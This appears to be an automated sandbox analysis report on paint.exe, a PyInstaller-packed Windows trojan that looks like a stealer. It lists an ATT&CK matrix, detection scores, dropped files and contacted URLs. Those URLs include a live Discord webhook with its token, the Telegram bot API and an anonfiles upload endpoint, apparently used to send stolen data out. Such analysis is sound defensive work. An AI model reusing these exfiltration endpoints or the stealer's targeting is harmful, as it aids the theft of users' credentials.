Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	11 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	151 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	11 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
paint.exe	43%	Virustotal		Browse
paint.exe	37%	ReversingLabs	Win64.Trojan.Lazy

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI67162\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-locale-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-math-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-process-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-runtime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-stdio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-time-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-utility-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\python312.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\ucrtbase.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67162\unicodedata.pyd	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://g..b.com/h	0%	Avira URL Cloud	safe
https://g..b.com/x	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
discord.com	162.159.137.232	true	false		high
ip-api.com	208.95.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0716_bmr9KcFyMQ8vNYrim	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Blank-c/BlankOBF	paint.exe, 00000001.00000003.1690340037.00000207714A0000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1690028343.0000020772398000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1690255723.0000020771843000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1690672181.00000207714A0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.avito.ru/	paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.ctrip.com/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.leboncoin.fr/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://discord.com/api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0	paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc2388#section-4.4	paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696827300.00000207718C2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp	false		high
https://weibo.com/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.anonfiles.com/upload	paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.msn.com	paint.exe, 00000001.00000003.1914665932.0000020772072000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772CC4000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000C.00000002.1893410367.0000019D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AD6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com/api/v9/users/	paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cacerts.digi	paint.exe, 00000000.00000003.1671769217.000002339314F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://peps.python.org/pep-0205/	paint.exe, 00000001.00000002.2008689837.0000020771590000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr	false		high
https://www.reddit.com/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000C.00000002.1831665258.0000019D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38ABB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.ca/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	paint.exe, 00000001.00000002.2007861507.0000020770EF0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://g..b.com/h	paint.exe, 00000001.00000003.1782235643.0000020771B9E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	paint.exe, 00000001.00000002.2007861507.0000020770EF0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.ebay.co.uk/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000002F.00000002.1831220495.000001B38ADDA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000C.00000002.1831665258.0000019D80228000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ebay.de/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000002F.00000002.1831220495.000001B38ADDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 0000002F.00000002.1831220495.000001B38BA88000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/issues/86361.	paint.exe, 00000001.00000003.1692710715.0000020771486000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1692909387.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1692909387.00000207714C3000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	false		high
https://httpbin.org/	paint.exe, 00000001.00000002.2010232784.0000020771C47000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	paint.exe, 00000001.00000002.2008331491.0000020771290000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	paint.exe, 00000001.00000002.2008331491.0000020771290000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1789072915.0000020771A14000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A2A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A14000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1712589930.0000020771A14000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://allegro.pl/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000002F.00000002.1831220495.000001B38ADDA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781796667.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696746336.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2009946233.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696827300.0000020771892000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004727333.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://MD8.mozilla.org/1/m	paint.exe, 00000001.00000002.2010663767.000002077207E000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C84000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004077065.0000020772076000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/psf/license/	paint.exe, paint.exe, 00000001.00000002.2015768208.00007FFDFB6D4000.00000040.00000001.01000000.00000005.sdmp	false		high
https://www.bbc.co.uk/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://bugzilla.mo	paint.exe, 00000001.00000002.2012300197.0000020772C68000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/importlib_metadata/wiki/Development-Methodology	paint.exe, 00000001.00000003.1711530938.0000020771B91000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771BA0000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012011288.0000020772710000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771B9E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc6125#section-6.4.3	paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.tro	paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000C.00000002.1831665258.0000019D80228000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g..b.com/x	paint.exe, 00000001.00000003.1734071594.0000020771B9E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/mail	paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/specifications/entry-points/	paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	paint.exe, 00000001.00000003.1915866896.0000020771B0A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1917249999.0000020771D1C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/psf/license/)	paint.exe, 00000001.00000002.2015768208.00007FFDFB5D0000.00000040.00000001.01000000.00000005.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.iqiyi.com/	paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://foss.heptapod.net/pypy/pypy/-/issues/3539	paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com/	paint.exe, 00000001.00000002.2008610347.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711380871.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1771294068.00000207714FE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc7231#section-4.3.6)	paint.exe, 00000001.00000003.1920015922.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1693798726.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1694074874.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781796667.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696653980.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2005810551.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2010232784.0000020771C60000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771C60000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discordapp.com/api/v9/users/	paint.exe, 00000001.00000002.2008689837.0000020771590000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	paint.exe, 00000001.00000003.1678970007.000002077107D000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2920	paint.exe, 00000001.00000002.2012011288.0000020772710000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771C38000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	paint.exe, 00000001.00000003.1915866896.0000020771B2D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://yahoo.com/	paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.bellmedia.c	paint.exe, 00000001.00000002.2012300197.0000020772CE0000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1753295021.0000020771B25000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1914665932.0000020772072000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696827300.0000020771892000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com	paint.exe, 00000001.00000002.2012300197.0000020772CD4000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1914665932.0000020772072000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C50000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	false		high
https://html.spec.whatwg.org/multipage/	paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696498061.0000020771927000.00000004.00000020.00020000.00000000.sdmp	false		high
